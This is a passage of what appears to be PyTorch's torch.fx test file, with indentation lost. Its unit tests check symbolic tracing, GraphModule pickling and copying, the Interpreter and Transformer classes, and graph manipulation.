class Simple(torch.nn.Module):
def forward(self, x):
return torch.neg(x)
seq = torch.nn.Sequential(
Simple(),
Simple(),
Simple()
)
traced = symbolic_trace(seq)
traced.graph.lint()
x = torch.rand(3, 4)
self.assertEqual(traced(x), seq(x))
def test_tensor_constant(self):
class ConstTensor(torch.nn.Module):
def forward(self, x):
return torch.nn.functional.linear(x, torch.zeros(3, 4))
ct = ConstTensor()
traced = symbolic_trace(ct)
traced.graph.lint()
traced(torch.rand(4, 4))
def test_pickle_graphmodule(self):
class Nested(torch.nn.Module):
def __init__(self):
super().__init__()
self.st = torch.nn.Linear(4, 4)
def forward(self, x):
return self.st(x)
n = Nested()
traced = symbolic_trace(n)
traced.graph.lint()
pickled = pickle.dumps(traced)
loaded = pickle.loads(pickled)
loaded.graph.lint()
x = torch.rand(3, 4)
self.assertEqual(loaded(x), traced(x))
def test_pickle_custom_import(self):
graph = torch.fx.Graph()
a = graph.placeholder('x')
b = graph.placeholder('y')
c = graph.call_function(a_non_torch_leaf, (a, b))
d = graph.call_function(torch.sin, (c,))
graph.output(d)
gm = GraphModule(torch.nn.Module(), graph)
pickled = pickle.dumps(gm)
loaded = pickle.loads(pickled)
loaded.graph.lint()
x, y = torch.rand(1), torch.rand(1)
self.assertEqual(loaded(x, y), gm(x, y))
def test_all_input_nodes(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.placeholder('x')
b : torch.fx.Node = graph.call_module('linear_mod', args=(a,))
c : torch.fx.Node = graph.get_attr('y_attr')
d : torch.fx.Node = graph.call_function(operator.add, args=(b, c))
e : torch.fx.Node = graph.call_function(torch.unsqueeze, args=(d, 0))
graph.output(e)
graph.lint()
self.assertEqual(b.all_input_nodes, [a])
self.assertEqual(c.all_input_nodes, [])
self.assertEqual(d.all_input_nodes, [b, c])
self.assertEqual(e.all_input_nodes, [d])
def test_deepcopy_graphmodule_with_transform(self):
st = SimpleTest()
traced = symbolic_trace(st)
traced.graph.lint()
def transform(traced):
new_graph = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
output_value = new_graph.graph_copy(traced.graph, val_map)
relu_out = new_graph.create_node(
op='call_method', target='neg', args=(output_value,), kwargs={})
new_graph.output(relu_out)
return GraphModule(traced, new_graph)
transformed = transform(traced)
transformed.graph.lint()
copied = copy.deepcopy(transformed)
self.assertNotEqual(id(type(transformed)), id(type(copied)))
x = torch.randn(3, 4)
self.assertEqual(copied(x), transformed(x))
def test_deepcopy_with_submods_params(self):
class Bar(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
def forward(self, x):
return torch.relu(x) + self.param
class Baz(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.bar = Bar()
def forward(self, x):
return self.bar(x) - self.param
baz = Baz()
traced = symbolic_trace(baz)
traced.graph.lint()
copied = copy.deepcopy(traced)
copied.graph.lint()
def test_unpack_list_better_error(self):
class SomeArgs(torch.nn.Module):
def forward(self, a, b):
return torch.rand(3, 4)
class UnpacksList(torch.nn.Module):
def __init__(self):
super().__init__()
self.sa = SomeArgs()
def forward(self, x : list):
return self.sa(*x)
ul = UnpacksList()
with self.assertRaisesRegex(TraceError, 'Proxy object cannot be iterated.'):
symbolic_trace(ul)
def test_unpack_dict_better_error(self):
class SomeKwargs(torch.nn.Module):
def forward(self, x=3, y=4):
return torch.rand(3, 4)
class UnpacksDict(torch.nn.Module):
def __init__(self):
super().__init__()
self.sk = SomeKwargs()
def forward(self, x : dict):
return self.sk(**x)
ud = UnpacksDict()
with self.assertRaisesRegex(TraceError, 'Proxy object cannot be iterated.'):
symbolic_trace(ud)
def test_pretty_print_targets(self):
# Test that Graph pretty-print prints friendly name for targets
# in `operator` and `builtins`
class SomeMod(torch.nn.Module):
def forward(self, x):
return torch.add(x.foo + x.bar, 3.0)
traced = symbolic_trace(SomeMod())
graph_str = str(traced.graph)
self.assertIn('builtins.getattr', graph_str)
self.assertIn('operator.add', graph_str)
self.assertIn('torch.add', graph_str)
def test_pretty_print_node(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
self.param: torch.nn.Parameter = torch.nn.Parameter(
torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x: torch.Tensor, y: int = 2):
return self.linear(x[y] + self.param).clamp(min=0.0, max=1.0)
traced = symbolic_trace(M())
all_formatted = "\n".join([n.format_node() for n in traced.graph.nodes])
FileCheck().check("x").check("placeholder") \
.check("y").check("placeholder") \
.check("getitem").check("call_function") \
.check("param").check("get_attr") \
.check("add").check("call_function") \
.check("linear").check("call_module") \
.check("clamp").check("call_method") \
.run(all_formatted)
def test_script_tensor_constant(self):
# TorchScript seems to ignore attributes that start with `__`.
# We used to call anonymous Tensor values `__tensor_constant*`, but
# they were getting ignored by script. Now they're called
# `_tensor_constant*`
class IHaveATensorConstant(torch.nn.Module):
def forward(self, x):
return x + torch.rand(3, 4)
traced = torch.fx.symbolic_trace(IHaveATensorConstant())
torch.jit.script(traced)
def test_torch_fx_len(self):
class FXLenTest(torch.nn.Module):
def forward(self, x):
return len(x)
traced = symbolic_trace(FXLenTest())
self.assertEqual(traced(torch.rand(3, 4)), 3)
# Test scriptability
scripted = torch.jit.script(FXLenTest())
self.assertEqual(scripted(torch.rand(3)), 3)
traced_scripted = torch.jit.script(traced)
self.assertEqual(traced_scripted(torch.rand(3)), 3)
# Test non-proxy len
class FXLenTest2(torch.nn.Module):
def __init__(self):
super().__init__()
self.l = [3, 4, 5]
def forward(self, x):
return x + len(self.l)
traced2 = symbolic_trace(FXLenTest2())
inp = torch.rand(3, 4)
self.assertEqual(traced2(inp), inp + 3.0)
self.assertIs(len, builtins.len)
def test_sqrt(self):
class Sqrt1(torch.nn.Module):
def forward(self, x):
return sqrt(x.size(0))
class Sqrt2(torch.nn.Module):
def forward(self, x):
return math.sqrt(x.size(0))
class Sqrt3(torch.nn.Module):
def forward(self, x):
return x + math.sqrt(2) + sqrt(2)
self.checkGraphModule(Sqrt1(), [torch.zeros(8)])
self.checkGraphModule(Sqrt2(), [torch.zeros(8)])
self.checkGraphModule(Sqrt3(), [torch.zeros(8)])
self.assertIs(sqrt, _sqrt)
self.assertIs(math.sqrt, _sqrt)
def test_torch_custom_ops(self):
class M(torch.nn.Module):
def forward(self, a):
b = torch.ops.aten.sigmoid(a)
c = torch.ops.aten.cat([a, b])
return torch.ops.aten.cat((c, c))
m = M()
input = torch.randn(3)
ref_out = m(input)
gm = symbolic_trace(m)
gm.graph.lint()
out = gm(input)
self.assertEqual(out, ref_out)
def test_pickle_torch_custom_ops(self):
class M(torch.nn.Module):
def forward(self, a):
b = torch.ops.aten.sigmoid(a)
c = torch.ops.aten.cat([a, b])
return torch.ops.aten.cat((c, c))
m = M()
input = torch.randn(3)
ref_out = m(input)
gm = symbolic_trace(m)
gm.graph.lint()
pickled = pickle.dumps(gm)
loaded = pickle.loads(pickled)
self.assertEqual(loaded(input), gm(input))
def test_pretty_print(self):
st = SimpleTest()
traced = symbolic_trace(st)
traced.graph.lint()
printed = str(traced)
assert 'SimpleTest()' in printed
assert 'torch.relu' in printed
def test_pretty_print_graph(self):
class KwargPrintTest(torch.nn.Module):
def forward(self, x):
return torch.squeeze(x + 3.0, dim=2)
st = KwargPrintTest()
traced = symbolic_trace(st)
traced.graph.lint()
stringed = str(traced.graph)
for s in ['args', 'kwargs', '#users']:
assert s in stringed
def test_graph_fns(self):
g = Graph()
a = g.placeholder('a')
b = g.call_module('linear', (a,))
c = g.get_attr('bias')
d = g.call_method('add', (b, c))
e = g.call_function(torch.sin, (d,))
g.output(e)
mod = torch.nn.Module()
mod.linear = torch.nn.Linear(3, 4)
mod.bias = torch.rand(4)
gm = GraphModule(mod, g)
gm.graph.lint()
input = torch.rand(3)
r = gm(input)
ref = torch.sin(mod.linear(input) + mod.bias)
self.assertEqual(r, ref)
def test_remove_uses(self):
g : torch.fx.Graph = Graph()
x : torch.fx.Node = g.placeholder('x')
relu : torch.fx.Node = g.call_function(torch.relu, (x,))
neg : torch.fx.Node = g.call_function(torch.neg, (relu,))
g.output(neg)
neg.replace_all_uses_with(relu)
g.erase_node(neg)
self.assertTrue(neg not in relu.users)
def test_nonetype_annotation(self):
eb = torch.nn.EmbeddingBag(3, 4)
symbolic_trace(eb)
def test_pickle_nonetype_annotation(self):
eb = torch.nn.EmbeddingBag(10, 3, mode='sum')
traced = symbolic_trace(eb)
pickled = pickle.dumps(traced)
loaded = pickle.loads(pickled)
loaded.graph.lint()
input = torch.LongTensor([1, 2, 4, 5, 4, 3, 2, 9])
offsets = torch.LongTensor([0, 4])
self.assertEqual(loaded(input, offsets), traced(input, offsets))
def test_return_tuple(self):
class M(torch.nn.Module):
def forward(self, x: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]:
return (x, x + x)
original = M()
traced = symbolic_trace(original)
self.assertEqual(traced(torch.ones(1)), original.forward(torch.ones(1)))
def test_construct_root_dict(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_module', 'foo.bar.baz', args=(a,))
c : torch.fx.Node = graph.create_node('get_attr', 'zip.zap.zam')
d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c))
graph.output(d)
linear_mod : torch.nn.Module = torch.nn.Linear(3, 4)
add_param : torch.Tensor = torch.rand(3, 4)
gm : torch.fx.GraphModule = torch.fx.GraphModule(
{'foo.bar.baz': linear_mod, 'zip.zap.zam' : add_param}, graph)
gm.graph.lint()
assert 'self.foo.bar.baz' in gm.code
x : torch.Tensor = torch.rand(3, 3)
out : torch.Tensor = gm(x)
ref_out : torch.Tensor = linear_mod(x) + add_param
self.assertEqual(out, ref_out)
def test_symbolic_trace_assert(self):
class AssertsTensorShape(torch.nn.Module):
def forward(self, x):
torch._assert(x.shape[1] > 4, "assert_foobar")
return x
m = AssertsTensorShape()
# verify traceability
traced = symbolic_trace(m)
# verify assertion on traced model works correctly at runtime
traced(torch.rand(4, 5))
with self.assertRaisesRegex(AssertionError, "assert_foobar"):
traced(torch.rand(4, 3))
# verify the symbolically traced module is scriptable
ms = torch.jit.script(m)
with self.assertRaisesRegex(torch.jit.Error, "assert_foobar"):
ms(torch.rand(4, 3))
def test_trace_fn_constant(self):
some_constant = torch.rand(3, 4)
def add_const(x):
return some_constant + x
traced = symbolic_trace(add_const)
input = torch.rand(3, 4)
self.assertEqual(traced(input), add_const(input))
def test_copy_no_remap(self):
traced = symbolic_trace(SimpleTest())
g = traced.graph
copied = torch.fx.Graph()
for node in g.nodes:
copied.node_copy(node)
with self.assertRaisesRegex(RuntimeError, 'does not belong to this Graph'):
copied.lint()
def test_wrong_topo(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_module', 'foo.bar.baz', args=(a,))
c : torch.fx.Node = graph.create_node('get_attr', 'zip.zap.zam')
d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c))
graph.output(d)
nodes = list(graph.nodes)
nodes[3].append(nodes[2])
with self.assertRaisesRegex(RuntimeError, 'was used before it has been defined'):
graph.lint()
def test_example_shape_prop(self):
class TestCase(torch.nn.Module):
def __init__(self):
super().__init__()
self.attr = torch.randn(3, 4)
self.submod = torch.nn.Linear(4, 4)
def forward(self, x):
return torch.neg(self.submod(x.relu() + self.attr))
tc = TestCase()
tc_traced = symbolic_trace(tc)
ref_out = tc_traced(torch.rand(3, 4))
shape_prop.ShapeProp(tc_traced).propagate(torch.rand(3, 4))
# Make sure we're testing all opcodes
opcodes = set()
output_shape : Optional[torch.Size] = None
output_stride : Optional[Tuple[int, ...]] = None
for node in tc_traced.graph.nodes:
opcodes.add(node.op)
if node.op == 'output':
output_shape = node.args[0].meta['shape']
output_stride = node.args[0].meta['stride']
self.assertEqual(opcodes, set(['placeholder', 'get_attr', 'call_function', 'call_method',
'call_module', 'output']))
# Test shape propagation and make sure results match actual
self.assertEqual(output_shape, ref_out.shape)
self.assertEqual(output_stride, ref_out.stride())
def test_interpreter(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
m = MyModule()
gm = torch.fx.symbolic_trace(m)
interpreter = Interpreter(gm)
input = torch.randn(3, 4)
self.assertEqual(interpreter.run(input), gm(input))
self.assertEqual(interpreter.run(input), m(input))
def test_interpreter_run_node_override(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
m = MyModule()
gm = torch.fx.symbolic_trace(m)
class RunNodeInterpreter(Interpreter):
def __init__(self, module):
super().__init__(module)
def run_node(self, n : Node) -> Any:
result = super().run_node(n)
n.cached_value = result
return result
input = torch.randn(3, 4)
RunNodeInterpreter(gm).run(input)
for node in gm.graph.nodes:
assert hasattr(node, 'cached_value')
def test_interpreter_onthefly_swap(self):
def fn(x):
return torch.sigmoid(x).neg()
gm = torch.fx.symbolic_trace(fn)
class NegSigmSwapInterpreter(Interpreter):
def call_function(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == torch.sigmoid:
return torch.neg(*args, **kwargs)
return super().call_function(target, args, kwargs)
def call_method(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == 'neg':
call_self, *args_tail = args
return call_self.sigmoid(*args_tail, **kwargs)
return super().call_method(target, args, kwargs)
input = torch.randn(3, 4)
result = NegSigmSwapInterpreter(gm).run(input)
self.assertEqual(result, torch.neg(input).sigmoid())
def test_interpreter_partial_eval(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
gm = torch.fx.symbolic_trace(MyModule())
interp = Interpreter(gm)
env = {}
for node in gm.graph.nodes:
if node.op == 'call_module' and node.target == 'linear':
env[node] = torch.arange(0, 12, 1).reshape(3, 4) - 6.0
break
assert len(env) == 1
x = torch.randn(3, 4)
result = interp.run(x, initial_env=env)
self.assertEqual(result, (torch.arange(0, 12, 1).reshape(3, 4) - 6.0).clamp(0.0, 1.0))
def test_interpreter_star_args(self):
def with_star_args(x, *args):
return x + args[0]
gm = torch.fx.symbolic_trace(with_star_args)
interp = Interpreter(gm)
result = interp.run(torch.ones(3, 4), torch.ones(3, 4), torch.rand(3, 4))
self.assertEqual(result, torch.ones(3, 4) * 2.0)
@skipIfNoTorchVision
def test_interpreter_noop_resnet18(self):
rn18 = resnet18()
transformed = torch.fx.Transformer(symbolic_trace(rn18)).transform()
inp = torch.randn(5, 3, 224, 224)
self.assertEqual(transformed(inp), rn18(inp))
@skipIfNoTorchVision
def test_interpreter_gc_values(self):
rn18 = resnet18()
interp = Interpreter(symbolic_trace(rn18))
inp = torch.rand(5, 3, 224, 224)
out = interp.run(inp)
env_key_names = set(n.name for n in interp.env.keys())
self.assertEqual(env_key_names, set(['output']))
def test_transformer_noop(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
m = MyModule()
gm = torch.fx.symbolic_trace(m)
new_gm = Transformer(gm).transform()
input = torch.randn(3, 4)
self.assertEqual(new_gm(input), gm(input))
def test_transformer_op_swap(self):
def fn(x):
return torch.sigmoid(x).neg()
gm = torch.fx.symbolic_trace(fn)
class NegSigmSwapXformer(Transformer):
def call_function(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == torch.sigmoid:
return torch.neg(*args, **kwargs)
return super().call_function(target, args, kwargs)
def call_method(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == 'neg':
call_self, *args_tail = args
return call_self.sigmoid(*args_tail, **kwargs)
return super().call_method(target, args, kwargs)
transformed = NegSigmSwapXformer(gm).transform()
input = torch.randn(3, 4)
self.assertEqual(transformed(input), torch.neg(input).sigmoid())
def test_transformer_multi_outputs(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
x = x + self.param
out = self.linear(x)
return x, out
m = MyModule()
gm = torch.fx.symbolic_trace(m)
new_gm = Transformer(gm).transform()
input = torch.randn(3, 4)
self.assertEqual(new_gm(input), gm(input))
def test_fn_type_annotations(self):
class Foo(torch.nn.Module):
def forward(self, p : Pair, z : torch.Tensor, i : int) -> Dict[str, torch.Tensor]:
return {'a': p.x + p.y + z + i}
foo_scripted = torch.jit.script(Foo())
foo_scripted(Pair(torch.rand(5), torch.rand(5)), torch.rand(5), 3)
fxed = symbolic_trace(Foo())
fxed_scripted = torch.jit.script(fxed)
fxed_scripted(Pair(torch.rand(5), torch.rand(5)), torch.rand(5), 3)
def test_fn_type_annotation_empty(self):
def forward(a : List[torch.Tensor]):
return a[0]
torch.jit.script(symbolic_trace(forward))
def test_wrapped_method(self):
def wrap_with_relu(fn):
@functools.wraps(fn)
def wrapper(*args, **kwargs):
return torch.relu(fn(*args, **kwargs))
return wrapper
class Foo(torch.nn.Module):
@wrap_with_relu
def forward(self, x, w):
return torch.matmul(x, w)
f = Foo()
traced = symbolic_trace(f)
x, w = torch.rand(3, 4), torch.rand(4, 4)
self.assertTrue(any(n.target == torch.relu for n in traced.graph.nodes))
def test_empty_graph_codegen(self):
graph = torch.fx.Graph()
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
self.assertEqual(gm(), None)
def test_sequential(self):
m = torch.nn.Sequential(torch.nn.Conv2d(1, 1, 1))
gm = torch.fx.symbolic_trace(m)
gm_copy = copy.deepcopy(gm)
def test_ctx_mgr(self):
@contextlib.contextmanager
def do_nothing():
yield
class M(torch.nn.Module):
def __init__(self):
super().__init__()
@do_nothing()
def forward(self, x):
return torch.relu(x)
m = M()
self.checkGraphModule(m, (torch.rand(3, 4),))
def test_typename_print(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,),
type_expr=List[float])
output : torch.fx.Node = graph.output(b)
self.assertTrue('typing.List[float]' in str(graph))
def test_ellipsis(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, x, y):
return x + y[:, 1:10, ...]
traced = symbolic_trace(M())
x, y = torch.rand(5, 9, 3, 4), torch.rand(5, 15, 3, 4)
self.assertEqual(traced(x, y), x + y[:, 1:10, ...])
def test_inf_nan(self):
class FooMod(torch.nn.Module):
def forward(self, x):
return x + float('inf'), x + float('-inf'), x + float('nan')
fm = FooMod()
self.checkGraphModule(fm, (torch.rand(3, 4),))
def test_inf_nan_kwds(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', operator.add, (x, float('inf')), {}, name='inf')
c : torch.fx.Node = graph.create_node('call_function', operator.add, (x, float('nan')), {}, name='nan')
graph.output((b, c))
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
x = torch.rand(3, 4)
self.assertEqual(gm(x), (x + float('inf'), x + float('nan')))
def test_deepcopy_recursion_depth(self):
depth = sys.getrecursionlimit() + 20
g = torch.fx.Graph()
x = g.placeholder('x')
for i in range(depth):
x = g.call_function(torch.relu, (x,))
g.output(x)
copied_graph = copy.deepcopy(g)
val_map = {}
for orig_node, new_node in zip(g.nodes, copied_graph.nodes):
val_map[orig_node] = new_node
for orig_node, new_node in zip(g.nodes, copied_graph.nodes):
orig_users = set(orig_node.users.keys())
orig_users_equiv = set(val_map[u] for u in orig_users)
new_users = set(new_node.users.keys())
self.assertEqual(orig_users_equiv, new_users)
@skipIfNoTorchVision
def test_replace_uses(self):
rn18 = resnet18()
class LowerReluTracer(torch.fx.Tracer):
def is_leaf_module(self, m : torch.nn.Module, qualname : str):
if isinstance(m, torch.nn.ReLU):
return False
return super().is_leaf_module(m, qualname)
rn18_traced = GraphModule(rn18, LowerReluTracer().trace(rn18))
to_erase = []
for node in rn18_traced.graph.nodes:
if node.op == 'call_function' and node.target in [torch.relu, torch.nn.functional.relu]:
kwargs = node.kwargs.copy()
# Neg doesn't have in-place
kwargs.pop('inplace')
with rn18_traced.graph.inserting_before(node):
new_node = rn18_traced.graph.call_function(
the_function=torch.neg, args=node.args, kwargs=kwargs)
node.replace_all_uses_with(replace_with=new_node)
to_erase.append(node)
for node in to_erase:
rn18_traced.graph.erase_node(node)
def test_insertion_point(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
with graph.inserting_before(b):
neg : torch.fx.Node = graph.call_function(the_function=torch.neg, args=(x,))
_, *relu_args = b.args
b.args = (neg, *relu_args)
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
input = torch.randn(33, 44)
self.assertEqual(gm(input), torch.relu(torch.neg(input)))
def test_move_before(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
neg : torch.fx.Node = graph.call_function(the_function=torch.neg, args=(x,))
_, *relu_args = b.args
b.args = (neg, *relu_args)
b.prepend(neg)
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
input = torch.randn(33, 44)
self.assertEqual(gm(input), torch.relu(torch.neg(input)))
def test_erase_node_error(self):
st = SimpleTest()
traced = symbolic_trace(st)
for node in traced.graph.nodes:
# Test deleting with uses both in another Node and at the output
if node.target in [operator.add, torch.relu]:
with self.assertRaisesRegex(RuntimeError, 'but it still had .* users in the graph'):
traced.graph.erase_node(node)
def test_copy_it(self):
d = immutable_dict([(3, 4), (5, 6)])
l = immutable_list([(3, 4), (5, 6)])
self.assertEqual(d, deepcopy(d))
self.assertEqual(l, deepcopy(l))
def test_get_torch_func_signature(self):
for key in dir(torch):
obj = getattr(torch, key)
if callable(obj):
schemas = get_signature_for_torch_op(obj)
def test_find_uses(self):
graph = torch.fx.Graph()
x = torch.fx.Proxy(graph.placeholder('x'))
y = torch.relu(x)
z = x + x
u = torch.neg(x)
graph.output((y + z + u).node)
graph.lint()
users_of_x = x.node.users
self.assertEqual(len(users_of_x), 3)
expected_ops = set(['relu', 'add', 'neg'])
for use in users_of_x:
assert any(use.name.startswith(prefix) for prefix in expected_ops)
def test_inline_graph(self):
class InlineInto(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
class ToInline(torch.nn.Module):
def forward(self, x):
return torch.neg(x)
inline_into = symbolic_trace(InlineInto())
to_inline = symbolic_trace(ToInline())
combined_graph = torch.fx.Graph()
output_node = combined_graph.graph_copy(inline_into.graph, {})
input_node = list(to_inline.graph.nodes)[0]
assert input_node and input_node.op == 'placeholder'
val_map = {input_node : output_node}
output = combined_graph.graph_copy(to_inline.graph, val_map)
combined_graph.output(output)
combined_module = torch.fx.GraphModule(torch.nn.Module(), combined_graph)
input = torch.rand(3, 4)
self.assertEqual(combined_module(input), input.relu().neg())
def test_multi_insert_point(self):
graph = torch.fx.Graph()
x = torch.fx.Proxy(graph.placeholder('x'))
relu = torch.relu(x)
with graph.inserting_before(relu.node):
y = torch.neg(x)
z = torch.tanh(y)
graph.output((relu.node, z.node))
graph.lint()
expected_ops = ['x', 'neg', 'tanh', 'relu']
for node, expected in zip(graph.nodes, expected_ops):
assert expected in node.name
def test_reassign_args_kwargs_uses(self):
graph = torch.fx.Graph()
x, y = Proxy(graph.placeholder('x')), Proxy(graph.placeholder('y'))
z = x + y
zed = z + z + z
graph.output(zed.node)
graph.lint()
# zed = z + z + z -> zed = z + z + x
zed.node.args = (zed.node.args[0], x.node)
self.assertEqual(x.node.users.keys(), [z.node, zed.node])
# z = x + y -> z = y + y
z.node.args = (y.node, y.node)
self.assertEqual(x.node.users.keys(), [zed.node])
def test_trace_function(self):
def foo(x, y):
return torch.relu(x) + y
x, y = torch.randn(3, 4), torch.randn(3, 4)
self.checkGraphModule(foo, (x, y))
def test_trace_dict_int_keys(self):
class ModWithDictArg(torch.nn.Module):
def forward(self, d : Dict[int, torch.Tensor]):
return d[42]
class CallsModWithDict(torch.nn.Module):
def __init__(self):
super().__init__()
self.m = ModWithDictArg()
def forward(self, x):
return self.m({42: x})
class MyTracer(torch.fx.Tracer):
def is_leaf_module(self, m: torch.nn.Module, module_qualified_name : str) -> bool:
return isinstance(m, ModWithDictArg)
traced_graph = MyTracer().trace(CallsModWithDict())
def test_trace_dict_proxy_keys(self):
class ModWithDictArg(torch.nn.Module):
def forward(self, d : Dict[torch.Tensor, torch.Tensor]):
return d[42]
class CallsModWithDict(torch.nn.Module):
def __init__(self):
super().__init__()
self.m = ModWithDictArg()
def forward(self, x):
return self.m({x: x})
class MyTracer(torch.fx.Tracer):
def is_leaf_module(self, m: torch.nn.Module, module_qualified_name : str) -> bool:
return isinstance(m, ModWithDictArg)
with self.assertRaisesRegex(RuntimeError, 'cannot contain a Node'):
traced_graph = MyTracer().trace(CallsModWithDict())
def test_direct_param_use(self):
class TransposeTest(torch.nn.Module):
def __init__(self):
super().__init__()
self.b = torch.nn.Parameter(torch.rand(4, 3))
def forward(self, x):
return self.b
class Foo(torch.nn.Module):
def __init__(self):
super().__init__()
self.a = TransposeTest()
def forward(self, x):
return self.a.b, self.a.b.t(), self.a.b.view(12)
traced = torch.fx.symbolic_trace(Foo())
assert(all('constant' not in node.target for node in traced.graph.nodes))
def test_single_default_arg(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, y=1):
return y
m = M()
self.checkGraphModule(m, ())
self.checkGraphModule(m, (3,))
def test_multiple_default_args(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, y=1, z=2):
return y + z
m = M()
self.checkGraphModule(m, ())
self.checkGraphModule(m, (3,))
self.checkGraphModule(m, (3, 4))
def test_regular_and_default_args(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, x, y=1):
return x + y
m = M()
self.checkGraphModule(m, (2,))
self.checkGraphModule(m, (2, 3))
def test_string_literal_return(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self):
return "foo"
m = M()
self.checkGraphModule(m, ())
def test_namedtuple_return_qualname(self):
class NamedTupReturn(torch.nn.Module):
def forward(self, x):
return MyNamedTup(x, x)
traced = symbolic_trace(NamedTupReturn())
input = torch.rand(3, 4)
self.assertEqual(traced(input), MyNamedTup(input, input))
def test_update_args_kwargs_yells_at_you(self):
symtraced = symbolic_trace(SimpleTest())
node = next(iter(symtraced.graph.nodes))
with self.assertRaisesRegex(AttributeError, '__update_args_kwargs'):
node.__update_args_kwargs((), {})
def test_torchbind_class_attribute_in_fx(self):
if TEST_WITH_ROCM or IS_SANDCASTLE or IS_WINDOWS or IS_MACOS:
self.skipTest("torch.classes._TorchScriptTesting._StackString is registered, skipping")
class FooBar1234(torch.nn.Module):
def __init__(self):
super(FooBar1234, self).__init__()
self.f = torch.classes._TorchScriptTesting._StackString(["3", "4"])
def forward(self):
return self.f.top()
m = FooBar1234()
self.checkGraphModule(m, ())
def test_torchbind_class_attribute_in_fx_tensor_arg(self):
if TEST_WITH_ROCM or IS_SANDCASTLE or IS_WINDOWS or IS_MACOS:
self.skipTest("torch.classes._TorchScriptTesting._ReLUClass is registered, skipping")
class FooBar2341(torch.nn.Module):
def __init__(self):
super(FooBar2341, self).__init__()
self.f = torch.classes._TorchScriptTesting._ReLUClass()
def forward(self, x):
return self.f.run(x)
m = FooBar2341()
traced = symbolic_trace(m)
input = torch.randn(3, 4)
self.assertEqual(traced(input), m(input))
self.assertTrue(any(n.op == 'call_method' for n in traced.graph.nodes))
def test_script_method_trace(self):
class Scripted(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
class Holder(torch.nn.Module):
def __init__(self):
super().__init__()
self.s = torch.jit.script(Scripted())
def forward(self, x):
return self.s(x)
h = Holder()
traced = symbolic_trace(h)
input = torch.randn(3, 4)
self.assertEqual(traced(input), h(input))
self.assertTrue(any(n.op == 'call_method' for n in traced.graph.nodes))
def test_namedtuple_return_trace(self):
class NamedTupReturn(torch.nn.Module):
def forward(self, x):
return Pair(x, x)
traced = symbolic_trace(NamedTupReturn())
input = torch.rand(3, 4)
self.assertEqual(traced(input), Pair(input, input))
def test_return_type_exists(self):
class ReturnTypeModule(torch.nn.Module):
def other(self, x: List[str]) -> List[str]:
return x
def forward(self, x: List[str]) -> List[str]:
return self.other(x)
traced = symbolic_trace(ReturnTypeModule())
self.assertIn("-> typing_List[str]", traced._code)
scripted = torch.jit.script(traced)
self.assertIn("-> List[str]", scripted.code)
def getitem_inner(self):
class GetItemBase(torch.nn.Module):
def __init__(self):
super().__init__()
self.register_buffer('pe', torch.randn(8, 8))
class GetItem1(GetItemBase):
def forward(self, x):
return self.pe[:, :x.size(0)]
class GetItem2(GetItemBase):
def forward(self, x):
return self.pe[x.size(0)]
class GetItem3(GetItemBase):
def forward(self, x):
return self.pe[4] # fx creates `self._tensor_constant0` here
self.checkGraphModule(GetItem1(), [torch.zeros(4)])
